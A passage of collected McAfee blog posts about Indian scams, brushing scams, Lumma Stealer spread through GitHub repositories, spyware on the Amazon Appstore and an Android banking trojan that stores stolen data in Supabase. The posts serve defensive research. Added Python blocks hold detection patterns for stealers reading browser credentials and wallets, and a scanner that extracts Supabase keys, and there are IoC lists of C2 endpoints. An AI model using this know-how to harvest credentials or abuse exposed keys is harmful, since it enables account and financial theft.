    • Check Your Transactions: Regularly review your bank statements for unauthorized charges.
    • Enable Alerts: Set up notifications for every card transaction to catch fraud early.
    • Protect Your Card: Be cautious at ATMs and shops to avoid skimming.
    • Use Virtual Cards: For online shopping, use one-time-use virtual cards if your bank provides them.
    • Install Security Software: Keep your devices safe with antivirus software to block phishing attempts.
    • Report Lost Cards: Inform your bank immediately if your card is lost or stolen.

     

    5. Fake Delivery Scam:

    Scam Tactics:

    In fake delivery scams, fraudsters pose as delivery services to trick you into providing personal information, card details, or payment. Common tactics include:

    • Phishing Messages: Scammers send texts or emails claiming there’s an issue with your package delivery. They include links to fake websites asking for payment or details.
      Example: “Your package couldn’t be delivered. Pay ₹50 to reschedule: [fake link].”
    • Impersonation Calls: Fraudsters call pretending to be delivery agents, saying extra charges are needed to complete the delivery.
    • Fake Delivery Attempts: A scammer posing as a delivery person asks for cash-on-delivery payment for a package you never ordered.
    • Malware Links: Links in fake delivery notifications may install malware on your device, stealing sensitive information.

    How to Identify Fake Delivery Scams:

    • Unexpected Notifications: You receive a delivery message for a package you didn’t order.
    • Urgent Payment Requests: The scam demands immediate action, such as paying a fee to receive your package.
    • Suspicious Links: Links in the message look unusual or redirect to websites that don’t match the official delivery service.
    • No Tracking Information: Legitimate delivery companies provide proper tracking numbers. Fake messages often lack these or give invalid ones.
    • Unprofessional Communication: Scammers’ messages may contain spelling errors, awkward language, or lack the company’s official logo.

    Impact:

    • Financial Loss: Victims may lose money through fake payment requests.
    • Personal Data Theft: Scammers can steal personal information like credit card details or addresses.
    • Device Infection: Clicking on malicious links can infect your device with malware or spyware.
    • Emotional Stress: Victims may feel anxious or distressed about being targeted.
    • Identity Theft: Stolen data can be used for fraud, such as opening accounts in your name.

    Prevention:


     

    6. Digital Arrest Scam

    Scam Tactics:

    Scammers pose as police officers or government officials, accusing victims of being involved in illegal activities like money laundering or cybercrime. They intimidate victims by threatening arrest or legal action unless immediate payment is made to “resolve the matter.”

    • Impersonation and Urgency: Scammers pose as authorities, creating a sense of urgency with threats of arrest or legal consequences to pressure victims.
    • Demands for Payment or Data: They demand immediate payments through untraceable methods or request sensitive personal information for identity theft.
    • Deceptive Tactics: Techniques like fake documents, spoofed contacts, and social engineering are used to make the scam appear credible and manipulate victims.

    How to Identify Digital Arrest Scam:

    • Unsolicited Contact: Be cautious of unexpected calls or messages claiming to be from authorities.
    • Urgency and Threats: Scammers often pressure victims with threats of immediate arrest unless payment is made.
    • Requests for Payment: Legitimate authorities don’t ask for payment over the phone.
    • Unverified Claims: Always verify legal claims by contacting authorities directly through official channels.
    • Isolation Tactics: If asked not to consult others, it’s a red flag.
    • Sensitive Information Requests: Never share personal or financial details over the phone.
    • Unprofessional Communication: Look for poorly written or vague messages.

    Impact: Daily losses from such scams run into lakhs, as victims panic and transfer money or provide sensitive information under pressure.

    Prevention:

    • Verify any claims of legal accusations directly with the authorities.
    • Avoid sharing personal or financial information over the phone.
    • Remember: Genuine law enforcement agencies do not demand payment over the phone.

    What to Do if You Fall Victim

    If you’ve fallen victim to any of the mentioned scams—Digital Arrest Scam, Instant Loan Scam, Voice Cloning Scam, WhatsApp Scam, Fake Delivery Scam or Credit Card Scam—it’s important to take immediate action to minimize damage and protect your finances and personal information. Here are common tips and steps to follow for all these scams:

    1. Report the Scam Immediately:
    • File a Complaint: Report the scam to your local authorities or cybercrime cell. In India, you can file complaints with the Cyber Crime Portal or your local police station. For instant assistance, dial 1930 to report cybercrime.
    • Inform Your Bank/Financial Institution: If you’ve shared financial details (e.g., bank account or credit card info), contact your bank or credit card provider immediately to block any transactions and prevent further losses.
    • Contact Your Mobile Service Provider: For scams involving SIM cards or mobile-based fraud (like voice cloning or WhatsApp scams), reach out to your service provider to block the number or disable the SIM.
    2. Secure Your Online Accounts:
    • Change Passwords: Immediately change passwords for any accounts that may have been compromised (banking, email, social media). Use strong, unique passwords for each account.
    • Enable Two-Factor Authentication (2FA): Activate two-factor authentication on your important accounts (e.g., email, bank, social media) to add an extra layer of security.
    • Review Account Activity: Look for unauthorized transactions or changes to your account settings and report them.
    3. Monitor Your Financial Statements:
    • Bank and Credit Card Statements: Regularly check your financial statements for unauthorized transactions. If you see any suspicious activity, report it to your bank immediately.
    • Freeze Your Credit: In cases of credit card scams or loan-related fraud, consider placing a freeze on your credit with major credit bureaus to prevent new accounts from being opened in your name.
    4. Do Not Respond to Unsolicited Messages:
    • If you receive unsolicited calls, messages, or emails asking for personal information, do not respond. Scammers often use these methods to steal sensitive data.
    • Do not click on links or download attachments from unknown sources.
    5. Be Cautious with Personal Information:
    • Never share sensitive information like your PIN, passwords, or OTP over the phone or through insecure channels like SMS or email.
    • Digital Arrest Scam: If you receive a threatening message about being arrested, verify the information through official government sources or your local police. Authorities will never demand payment for legal issues.
    6. Report the Phone Number/Email:
    • If the scam came via WhatsApp, SMS, or phone calls, report the number to the respective platform. For WhatsApp, you can block the number and report it directly in the app. Similarly, report phishing emails to your email provider.
    7. Preserve Evidence:
    • Save Screenshots or Records: Keep any evidence (messages, emails, screenshots, etc.) that can be used to investigate the scam. These may be useful when filing a complaint or disputing fraudulent transactions.
    8. Educate Yourself and Others:
    • Stay informed about the latest scams and fraud tactics. Being aware of common signs of scams (e.g., too-good-to-be-true offers, urgent demands for money, etc.) can help you avoid future threats.

    Conclusion:

    As scams in India continue to grow in number and sophistication, it is crucial to raise awareness to protect individuals and businesses from falling victim to these fraudulent schemes. Scams such as phishing, fake job offers, credit card scams, loan scams, investment frauds and online shopping frauds are increasingly targeting unsuspecting victims, causing significant financial loss and emotional harm.

    By raising awareness of scam warning signs and encouraging vigilance, we can equip individuals to make safer, more informed decisions online. Simple precautions, such as verifying sources, being cautious of unsolicited offers, and safeguarding personal and financial information, can go a long way in preventing scams.

    It is essential for both individuals and organizations to stay informed and updated on emerging scam tactics. Through continuous awareness and proactive security measures, we can reduce the impact of scams, ensuring a safer and more secure digital environment for everyone in India.

    The post Rising Scams in India: Building Awareness and Prevention appeared first on McAfee Blog.

    GitHub’s Dark Side: Unveiling Malware Disguised as Cracks, Hacks, and Crypto Tools

    Authored by Aayush Tyagi

    Video game hacks, cracked software, and free crypto tools remain popular bait for malware authors. Recently, McAfee Labs uncovered several GitHub repositories offering these tempting “rewards,” but a closer look reveals something more sinister. As the saying goes, if it seems too good to be true, it probably is.

    GitHub is often exploited for malware distribution due to its accessibility, trustworthiness, and developer-friendly features. Attackers can easily create free accounts and host repositories that appear legitimate, leveraging GitHub’s reputation to deceive users.

    McAfee Labs encountered multiple repositories offering game hacks for top-selling video games such as Apex Legends, Minecraft, Counter Strike 2.0, Roblox, Valorant, Fortnite, Call of Duty and GTA V, or offering cracked versions of popular software and services, such as Spotify Premium, FL Studio, Adobe Express, SketchUp Pro, Xbox Game Pass, and Discord, to name a few.

    Executive summary

    These attack chains begin when users search the internet for game hacks, cracked software or cryptocurrency tools and come across GitHub repositories, or YouTube videos linking to such repositories, that offer this software.

    We noticed a network of such repositories where the description of the software keeps changing, but the payload remains the same: a Lumma Stealer variant. Every week, a new set of repositories with a new malware variant is released, as the older repositories are detected and removed by GitHub. These repositories also include distribution licenses and software screenshots to enhance their appearance of legitimacy.

    Figure 1: Attack Vector

    These repositories also contain instructions on how to download and run the malware, and ask the user to disable Windows Defender or any other AV software before downloading it. The justification given is that, since the software relates to game hacks, bypassing software authentication or cryptocurrency mining, AV products will detect and delete these applications.

    This social engineering technique, combined with the trustworthiness of GitHub, works in favor of the malware authors, enabling them to infect more users.

    Children are frequently targeted by such scams, as malware authors exploit their interest in game hacks by highlighting potential features and benefits, making it easier to infect more systems.

    Technical Analysis

    As discussed above, users come across malicious repositories through internet searches (highlighted in red).

    Figure 2: Internet Search showing GitHub results.

    Or through YouTube videos that contain a link to the repository in the description (highlighted in red).

    Figure 3: YouTube Video containing malicious URL in description.

    Once the user accesses the GitHub repository, they find a distribution license and other supporting files, included to make the repository look genuine and credible.

    Figure 4: GitHub repository containing Distribution license.

    Repositories also contain a detailed description of the software and the installation process, further manipulating the user.

    Figure 5: Download instructions present in the repository.

    Sometimes, the repositories contain instructions to disable AV products, misleading users into infecting themselves with the malware.

    Figure 6: Instructions to disable Windows Defender.

    To target more children, repositories contain a detailed description of the software, highlighting all the features included in the package, such as aimbots and speed hacks, and how easily users will be able to gain an advantage over their opponents.

    They even mention that the package comes with an advanced anti-ban system, so the account won’t be suspended, and that the software has a popular community. This creates the impression that, since many users are already running the software, it must be safe to use, and that by not using it they are missing out.

    Figure 7: Features mentioned in the GitHub repository.

    The downloaded files were, in most cases, Lumma Stealer variants, but in the latest repositories we noticed new malware variants being distributed through the same infection vector.

    Once the user downloads the file, they get the following set of files.

    Figure 8: Files downloaded from GitHub repository.

    On running ‘Loader.exe’ as instructed, it iterates through the file system and registry keys to collect sensitive information.

    Figure 9: Loader.exe checking for Login credentials for Chrome.

    It searches for crypto wallets and password-related files, enumerates the browsers installed on the system and iterates through their user data to gather anything useful.

    Figure 10: Loader.exe checking for Browsers installed on the system.

    Then the malware connects to C2 servers to transfer the collected data.

    Figure 11: Loader.exe connecting to C2 servers to transfer data.

    This behavior is similar to the Lumma Stealer variants we have seen earlier.
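    As an added example for this section (not code from McAfee or from the sample), the loader’s sequence in Figures 9 to 11, reading browser credential stores and wallet files and then connecting out, expressed as detection logic over constructed endpoint telemetry; the event shape, file paths and process names are assumptions:

```python
import re
from collections import defaultdict

# Browser credential stores and wallet locations the loader enumerates.
# The path patterns are assumptions for this example, not McAfee's signatures.
SENSITIVE_PATHS = [
    (re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$", re.I), "browser_logins"),
    (re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\Web Data$", re.I), "browser_autofill"),
    (re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\Cookies$", re.I), "browser_cookies"),
    (re.compile(r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\logins\.json$", re.I), "browser_logins"),
    (re.compile(r"\\(Exodus|Electrum|Ethereum)\\", re.I), "crypto_wallet"),
]

# Processes that are expected to open their own profile files.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}

# Constructed endpoint telemetry as (event type, process image, target); shaped
# after the Figure 9-11 sequence, not taken from a real sensor.
CONSTRUCTED_EVENTS = [
    ("file_open", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    ("file_open", r"C:\Users\alice\Downloads\Loader\Loader.exe",
     r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    ("file_open", r"C:\Users\alice\Downloads\Loader\Loader.exe",
     r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Web Data"),
    ("file_open", r"C:\Users\alice\Downloads\Loader\Loader.exe",
     r"C:\Users\alice\AppData\Roaming\Exodus\exodus.wallet\seed.seco"),
    ("net_connect", r"C:\Users\alice\Downloads\Loader\Loader.exe", "203.0.113.10:443"),
    ("file_open", r"C:\Windows\System32\svchost.exe",
     r"C:\Windows\System32\drivers\etc\hosts"),
]


def classify_path(path):
    """Return the sensitive-data category of a file path, or None."""
    for pattern, category in SENSITIVE_PATHS:
        if pattern.search(path):
            return category
    return None


def summarize_by_process(events):
    """Collect, per process image, the categories it read and its connections."""
    per_proc = defaultdict(lambda: {"categories": set(), "connects": []})
    for kind, image, target in events:
        if kind == "file_open":
            category = classify_path(target)
            if category:
                per_proc[image]["categories"].add(category)
        elif kind == "net_connect":
            per_proc[image]["connects"].append(target)
    return per_proc


def find_stealer_candidates(events):
    """Flag non-browser processes that read credential stores or wallet files.

    Reading two or more categories, or any wallet file, and then connecting
    out is the loader's sequence in Figures 9 to 11 and is rated high.
    """
    alerts = []
    for image, info in summarize_by_process(events).items():
        if image.rsplit("\\", 1)[-1].lower() in BROWSER_IMAGES:
            continue  # a browser reading its own profile is expected
        categories = info["categories"]
        if not categories:
            continue
        broad = len(categories) >= 2 or "crypto_wallet" in categories
        severity = "high" if broad and info["connects"] else "medium"
        alerts.append({"image": image, "categories": sorted(categories),
                       "connects": list(info["connects"]), "severity": severity})
    return alerts


if __name__ == "__main__":
    for alert in find_stealer_candidates(CONSTRUCTED_EVENTS):
        print(alert["severity"], alert["image"], alert["categories"], alert["connects"])
```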

    Detection and Mitigation Strategies

    McAfee blocks this infection chain at multiple stages:

    1. URL blocking of the GitHub repository.

    Figure 12: McAfee blocking URLs

    2. Detecting the downloaded malware.

    Figure 13: McAfee blocking the malicious file

    Conclusion and Recommendations

    In conclusion, the GitHub repository infection chain demonstrates how cybercriminals exploit the accessibility and trustworthiness of popular websites such as GitHub to distribute malware like Lumma Stealer. By leveraging users’ desire to use game hacks to get better at a video game, or to obtain licensed software for free, they trick users into infecting themselves.

    At McAfee Labs, we are committed to helping organizations protect themselves against sophisticated cyber threats, such as the GitHub repository technique. Here are our recommended mitigations and remediations:

    1. Children are usually the prime targets for such scams, so it is important to educate them and teach them how to avoid such suspicious websites.
    2. Conduct regular training sessions to educate users about social engineering tactics and phishing schemes.
    3. Install and maintain updated antivirus and anti-malware software on all endpoints.
    4. Use network segmentation to limit the spread of malware within the organization.
    5. Ensure all operating systems, software, and applications are kept up to date with the latest security patches.
    6. Avoid downloading cracked software or visiting suspicious websites.
    7. Verify URLs in emails, especially from unknown or unexpected sources.
    8. Keep antivirus solutions updated and actively scanning.
    9. Avoid downloading Game hacks or Crypto software from unofficial websites.
    10. If possible, read reviews about the software you’re downloading and see what other users are saying about it.
    11. Regularly patch browsers, operating systems, and applications.
    12. Monitor the Temp folder for unusual or suspicious files.

    Indicators of Compromise (IoCs)

    As of publishing this blog, these are the GitHub repositories that are currently active.


    The post GitHub’s Dark Side: Unveiling Malware Disguised as Cracks, Hacks, and Crypto Tools appeared first on McAfee Blog.

    Brushing Scams: What They Are and How to Stay Safe From Unsolicited Packages

    By: McAfee

    It’s an increasingly common surprise: a package shows up at your door with your name and your address…but you never ordered it.  

    These unsolicited deliveries may seem harmless, but they’re often tied to a scheme called a brushing scam. These scams occur year-round but tend to pick up around the holidays or peak shopping seasons, when shipping volume spikes and it’s easier for suspicious packages to blend in. 

    Below is everything you need to know: how brushing scams work, what they mean for your personal information, and the exact steps to take if one shows up at your doorstep.

    Takeaways

    • A brushing scam is when a seller sends you an item you didn’t order so they can post a fake “verified purchase” review under your name. 
    • These scams usually involve low-value items like cheap jewelry, seeds, or trinkets. 
    • Unexpected packages can signal that your personal data was exposed in a breach or has been purchased illegally. 
    • You don’t have to return the item, but you should report it, update your passwords, and check for suspicious activity. 
    • These scams increase during busy shipping periods, including holidays. 

    What Is a Brushing Scam? 

    A brushing scam is when sellers send you unsolicited items so they can post fake reviews using your name, boosting their product’s ranking and credibility without your consent. 

    How Brushing Scams Work 

    A typical brushing scam looks like this: 

    1. A scammer creates or uses a seller account on a marketplace like Amazon or AliExpress. 
    2. They obtain your name and address, often through a breach, data leak, or illegal database. 
    3. They “order” their own product but send it to you at no cost. 
    4. Once shipping confirms delivery, they post a fake verified review under your identity to boost their seller rating. 
    5. The product gains more visibility, which drives more sales. 

    In one sentence: Your delivery confirmation becomes their proof that a real customer received the item—even though you never ordered it. 

    Why It’s Called “Brushing” 

    The term comes from e-commerce, where sellers would “brush up” their sales by generating fake orders and reviews. Today, brushing scams are a global issue affecting major online marketplaces. 

    Common Items Sent in Brushing Scams 

    • Costume jewelry 
    • Small electronics or keychain gadgets 
    • Random home goods 
    • Seeds (often unmarked) 
    • Low-cost accessories 

    If the item feels random or unusually cheap, it fits the profile. 

    Are Brushing Scams Dangerous? 

    Personal Data Exposure

    The biggest red flag is that someone had your name and address, and possibly more. Brushing scams often follow data breaches or third-party leaks. 

    Account Risk

    Some platforms may temporarily flag or freeze your account if someone posts fake reviews under your name. 

    Misleading Products

    Fake reviews inflate trust and push low-quality items higher in search results. That misleads other shoppers and props up fraudulent sellers.

    Potential Safety Hazards

    Some unsolicited items—cosmetics, supplements, electronics, or seeds—may be unsafe, expired, counterfeit, or banned. 

    What To Do If You Receive an Unordered Package 

    1. Don’t use or consume the item, especially cosmetics, food, or electronics. 
    2. Check your marketplace account (Amazon, AliExpress, etc.) to confirm there’s no unauthorized order. 
    3. Report the brushing scam using the platform’s built-in reporting tools. 
    4. Update your passwords for your shopping account and linked email. 
    5. Enable two-factor authentication (2FA) for added security. 
    6. Monitor bank/credit card activity for unusual charges. 
    7. If the package came via USPS, you can mark it “Return to sender” without cost. 

    How to Report a Brushing Scam on Amazon 

    1. Log into your Amazon account. 
    2. Go to the Report Unsolicited Package section. 
    3. Add your tracking number and package details. 
    4. Amazon may take up to 10 days to investigate. 

    Should You Return the Package? 

    Generally: No.

    You are not legally required to return or pay for an unsolicited package. But reporting it helps platforms investigate fraudulent sellers. 

    How To Protect Yourself From Brushing Scams

    Secure Your Accounts

    Report Every Unsolicited Package

    This helps platforms identify abusive sellers.

    Verify Reviews Before Buying

    Genuine reviews mention specific details; fake ones are vague, repetitive, or overly positive.

    Stick to Well-Reviewed, Long-Standing Sellers

    Avoid newly created storefronts with few verified reviews.

    Quick FAQ 

    Why am I receiving random packages from overseas?
    It’s often part of a brushing scam where sellers need a “delivered” status to post fake reviews.

    Is a brushing scam identity theft?
    Not exactly, but it does mean someone had access to your personal data, which increases your overall risk.

    Should I throw the item away?
    You can safely discard most brushing-scam items, but avoid using them and report the incident first.

    Should I worry if I get seeds or soil?
    Yes—never plant or dispose of unknown seeds improperly. Report them to the USDA or your state agriculture office.

    Final Thoughts

    Brushing scams may seem like a harmless freebie, but they’re a sign that your personal information was exposed and could potentially be misused.

    Stay cautious, secure your accounts, report any unsolicited packages, and trust only reputable sellers. With simple steps, you can protect your identity, and avoid being pulled into a scammer’s fake review scheme.

    The post Brushing Scams: What They Are and How to Stay Safe From Unsolicited Packages appeared first on McAfee Blog.

    Spyware distributed through Amazon Appstore

    Authored by Wenfeng Yu and ZePeng Chen

    As smartphones have become an integral part of our daily lives, malicious apps have grown increasingly deceptive and sophisticated. Recently, we uncovered a seemingly harmless app called “BMI CalculationVsn” on the Amazon Appstore, which was secretly stealing the package names of installed apps and incoming SMS messages under the guise of a simple health tool. McAfee reported the app to Amazon, which took prompt action; the app is no longer available on the Amazon Appstore.

    Figure 1. Application published on Amazon Appstore

    Superficial Functionality: Simple BMI Calculation

    On the surface, this app appears to be a basic tool, providing a single page where users can input their weight and height to calculate their BMI. Its interface looks entirely consistent with a standard health application. However, behind this innocent appearance lies a range of malicious activities.

    Figure 2. Application MainActivity

    Malicious Activities: Stealing Private Data

    Upon further investigation, we discovered that this app engages in the following harmful behaviors:

    1. Screen Recording: The app starts a background service to record the screen. When the user clicks the “Calculate” button, the Android system pops up a screen-recording permission request and recording starts. This functionality is likely intended to capture gesture passwords or sensitive data from other apps. In the latest samples, however, this function is not finished: the code does not upload the recorded mp4 file to the C2 server, and at the beginning of the startRecording() method the developer added an early return, so the rest of the method never executes.

    Figure 3. Screen Recorder Service Code

    When the recording starts, the permission request dialog will be displayed.

    Figure 4. Start Recording Request.

    2. Installed App Information: The app scans the device to retrieve a list of all installed applications. This data could be used to identify target users or plan more advanced attacks.

    Figure 5. Upload User Data

    3. SMS Messages: It intercepts and collects all SMS messages received on the device, potentially to capture one-time passwords (OTPs), verification codes and other sensitive information. The intercepted text messages are added to Firebase (storage bucket: testmlwr-d4dd7.appspot.com).

    Malware under development:

    According to our analysis of historical samples, this malicious app is still in the development and testing stage and has not reached a completed state. Searching VirusTotal for related samples by the malware’s package name (com.zeeee.recordingappz) revealed its development history: the malware was first developed in October 2024 as a screen recording app, but midway through the app’s icon was changed to the BMI calculator, and the payload to steal SMS messages was added in the latest version.

    Figure 6. The Timeline of Application Development

    The Firebase Installations API address used by this app contains the string “testmlwr”, which suggests that the app is still in the testing phase.

    App Developer Information:

    According to the product details on the Amazon page, the developer’s name is “PT. Visionet Data Internasional”. The malware author abused the name of an enterprise IT management service provider in Indonesia to distribute this malware on the Amazon Appstore, which suggests that the author may have knowledge of Indonesia.

    Figure 7. Developer Information

    How to Protect Yourself

    To avoid falling victim to such malicious apps, we recommend the following precautions:

    1. Install Trusted Antivirus Apps: Use reliable antivirus software to detect and prevent malicious apps before they can cause harm.
    2. Review Permission Requests: When installing an app, carefully examine the permissions it requests. Deny any permissions that seem unrelated to its advertised functionality. For instance, a BMI calculator has no legitimate reason to request access to SMS or screen recording.
    3. Stay Alert: Watch for unusual app behavior, such as reduced device performance, rapid battery drain, or a spike in data usage, which could indicate malicious activity running in the background.

    Conclusion

    As cybercrime continues to evolve, it is crucial to remain vigilant in protecting our digital lives. Apps like “BMI CalculationVsn” serve as a stark reminder that even the simplest tools can harbor hidden threats. By staying alert and adopting robust security measures, we can safeguard our privacy and data.

    IoC

    Distribution website:

    • hxxps://www.amazon.com/PT-Visionet-Data-Internasional-CalculationVsn/dp/B0DK1B7ZM5/

    C2 servers/Storage buckets:

    • hxxps://firebaseinstallations.googleapis.com/v1/projects/testmlwr-d4dd7
    • hxxps://6708c6e38e86a8d9e42ffe93.mockapi.io/
    • testmlwr-d4dd7.appspot.com

    Sample Hash:

    • 8477891c4631358c9f3ab57b0e795e1dcf468d94a9c6b6621f8e94a5f91a3b6a

    The post Spyware distributed through Amazon Appstore appeared first on McAfee Blog.

    A New Android Banking Trojan Masquerades as Utility and Banking Apps in India

    Authored by Dexter Shin

    Over the years, cyber threats targeting Android devices have become more sophisticated and persistent. Recently, McAfee Mobile Research Team discovered a new Android banking trojan targeting Indian users. This malware disguises itself as essential services, such as utility (e.g., gas or electricity) or banking apps, to get sensitive information from users. These types of services are vital for daily life, making it easier to lure users. We have previously observed malware that masquerades as utility services in Japan. As seen in such cases, utility-related messages, such as warnings that gas service will disconnect soon unless the bill is checked, can cause significant alarm and prompt immediate action from the users.

    We have identified that this malware has infected 419 devices, intercepted 4,918 SMS messages, and stolen 623 entries of card or bank-related personal information. Given the active malware campaigns, these numbers are expected to rise. McAfee Mobile Security already detects this threat as Android/Banker. For more information, visit McAfee Mobile Security.

    Phishing through messaging platforms like WhatsApp

    As of 2024, India is the country with the highest number of monthly active WhatsApp users. This makes it a prime target for phishing attacks. We’ve previously introduced another Banker distributed via WhatsApp. Similarly, we suspect that the sample we recently found also uses messaging platforms to reach individual users and trick them into installing a malicious APK. If a user installs this APK, it will allow attackers to steal the victim’s financial data, thereby accomplishing their malicious goal.

    Figure 1. Scammer messages reaching users via WhatsApp (source: reddit)

    Inside the malware

    The malware we first identified was pretending to be an app that allowed users to pay their gas bills. It used the logo of PayRup, a digital payment platform for public service fees in India, to make it look more trustworthy to users.

    Figure 2. Malware disguised as gas bills digital payment app

    Once the app is launched and the permissions designed to steal personal data such as SMS messages are granted, it asks the user for financial information, such as card details or bank account information. Since this malware pretends to be a bill-payment app, users are likely to enter this information to complete their payment. On the bank page, major Indian banks like SBI and Axis Bank are listed as options.

    Figure 3. Malware that requires financial data

    If the user inputs their financial information and tries to make a payment, the data is sent to the command and control (C2) server. Meanwhile, the app displays a payment failure message to the user.

    Figure 4. Payment failure message displayed but data sent to C2 server

    One thing to note about this app is that it can’t be launched directly by the user through the launcher. For an Android app to appear in the launcher, it needs to declare “android.intent.category.LAUNCHER” within an <intent-filter> in its AndroidManifest.xml. Since this app doesn’t declare that category, its icon doesn’t appear. Consequently, after the app has been installed and launched from a phishing message, users may not realize it is still installed on their device, even if they close it after seeing messages like “Bank Server is Down”; this effectively keeps it hidden.

    Figure 5. AndroidManifest.xml for the sample
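    An added triage helper, not the researchers’ code, covering the two manifest traits the reports above single out: the SMS permissions and receiver that a BMI calculator has no use for, and the missing LAUNCHER category that keeps this banker’s icon hidden. The manifests and the permission list are constructed for the example:

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
LAUNCHER_CATEGORY = "android.intent.category.LAUNCHER"
SMS_RECEIVED_ACTION = "android.provider.Telephony.SMS_RECEIVED"

# Permissions a BMI calculator or a bill-payment front end has no use for.
# The list is an assumption for this example, not a complete catalogue.
SENSITIVE_PERMISSIONS = {
    "android.permission.RECEIVE_SMS": "intercept incoming SMS, including OTPs",
    "android.permission.READ_SMS": "read stored SMS",
    "android.permission.SEND_SMS": "send or forward SMS",
    "android.permission.QUERY_ALL_PACKAGES": "enumerate installed apps",
}


def _name(elem):
    """Read the namespaced android:name attribute of a manifest element."""
    return elem.get("{%s}name" % ANDROID_NS)


def triage_manifest(xml_text):
    """Summarise the manifest traits the two reports turn on: sensitive
    permissions, an SMS_RECEIVED receiver, and whether any activity or
    activity-alias carries the LAUNCHER category (none means no icon)."""
    root = ET.fromstring(xml_text)
    requested = sorted(
        _name(p) for p in root.iter("uses-permission")
        if _name(p) in SENSITIVE_PERMISSIONS
    )
    sms_receiver = any(
        _name(action) == SMS_RECEIVED_ACTION
        for receiver in root.iter("receiver")
        for action in receiver.iter("action")
    )
    has_launcher = any(
        _name(category) == LAUNCHER_CATEGORY
        for tag in ("activity", "activity-alias")
        for component in root.iter(tag)
        for category in component.iter("category")
    )
    findings = ["requests %s (%s)" % (p, SENSITIVE_PERMISSIONS[p]) for p in requested]
    if sms_receiver:
        findings.append("registers a receiver for SMS_RECEIVED")
    if not has_launcher:
        findings.append("no LAUNCHER activity: no icon, app stays hidden after install")
    return {
        "package": root.get("package"),
        "sensitive_permissions": requested,
        "sms_receiver": sms_receiver,
        "has_launcher": has_launcher,
        "findings": findings,
    }


# Constructed manifests that mirror the traits described in the two reports;
# they are not the real samples' manifests.
BMI_LIKE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.bmi.constructed">
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <application>
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <receiver android:name=".SmsReceiver">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>"""

HIDDEN_BANKER_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.gasbill.constructed">
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <application>
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
            </intent-filter>
        </activity>
        <receiver android:name=".SmsReceiver">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>"""

if __name__ == "__main__":
    for manifest in (BMI_LIKE_MANIFEST, HIDDEN_BANKER_MANIFEST):
        report = triage_manifest(manifest)
        print(report["package"], report["findings"])
```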

     

    Exploiting Supabase for data exfiltration

    In previous reports, we’ve introduced various C2 servers used by malware. However, this malware stands out due to its unique use of Supabase, an open-source database service. Supabase is an open-source backend-as-a-service, similar to Firebase, that provides PostgreSQL-based database, authentication, real-time features, and storage. It helps developers quickly build applications without managing backend infrastructure. Also, it supports RESTful APIs to manage their database. This malware exploits these APIs to store stolen data.

    Figure 6. App code using Supabase

    A JWT (JSON Web Token) is required to use Supabase through its RESTful APIs. Interestingly, the JWT is exposed in plain text within the malware’s code. This gave us a unique opportunity to investigate the extent of the data breach: using this token, we were able to access the Supabase instance used by the malware and gain valuable insight into the scale and nature of the data exfiltration.

    Figure 7. JWT token exposed in plaintext
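    An added example (not McAfee’s tooling) of the triage step described here: locate JWT-shaped strings in a sample’s decompiled code, read their claims without verifying the signature, and flag the ones issued by Supabase together with the project they point at. The project ref, token and string fragment are constructed:

```python
import base64
import json
import re

# A JWT is three base64url segments joined by dots; "eyJ" is how a JSON
# object ('{"') encodes, so the header and payload segments start that way.
JWT_RE = re.compile(r"eyJ[A-Za-z0-9_-]{10,}\.eyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}")


def _b64url_decode(segment):
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(data):
    return base64.urlsafe_b64encode(data).decode("ascii").rstrip("=")


def decode_jwt_claims(token):
    """Return (header, claims) of a JWT WITHOUT checking its signature.

    Triage only needs to read the claims; verifying would require the
    project's signing secret, which an analyst does not have.
    """
    header_b64, payload_b64, _signature = token.split(".")
    return json.loads(_b64url_decode(header_b64)), json.loads(_b64url_decode(payload_b64))


def find_supabase_keys(text):
    """Scan decompiled strings for Supabase API keys and summarise each one."""
    found = []
    for match in JWT_RE.finditer(text):
        try:
            header, claims = decode_jwt_claims(match.group(0))
        except ValueError:  # JSONDecodeError and binascii.Error are subclasses
            continue
        if not isinstance(claims, dict) or claims.get("iss") != "supabase":
            continue
        ref, role = claims.get("ref"), claims.get("role")
        found.append({
            "ref": ref,
            "role": role,
            "alg": header.get("alg"),
            "exp": claims.get("exp"),
            # Supabase projects are served at https://<ref>.supabase.co
            "api_base": "https://%s.supabase.co" % ref if ref else None,
            # A service_role key bypasses row-level security entirely; an anon
            # key only reaches whatever the project's RLS policies leave open.
            "severity": "critical" if role == "service_role" else "high",
        })
    return found


def make_constructed_token(ref, role):
    """Build a token with the claim layout Supabase uses. The signature is
    bogus, so this stands in for a key found in a sample, not a real one."""
    def compact(obj):
        return json.dumps(obj, separators=(",", ":")).encode()
    header = {"alg": "HS256", "typ": "JWT"}
    claims = {"iss": "supabase", "ref": ref, "role": role,
              "iat": 1728432000, "exp": 2043792000}
    return ".".join([_b64url_encode(compact(header)), _b64url_encode(compact(claims)),
                     _b64url_encode(b"\x00" * 32)])


# Constructed fragment of decompiled smali-like strings, standing in for the
# code shown in Figures 6 and 7; the project ref is made up.
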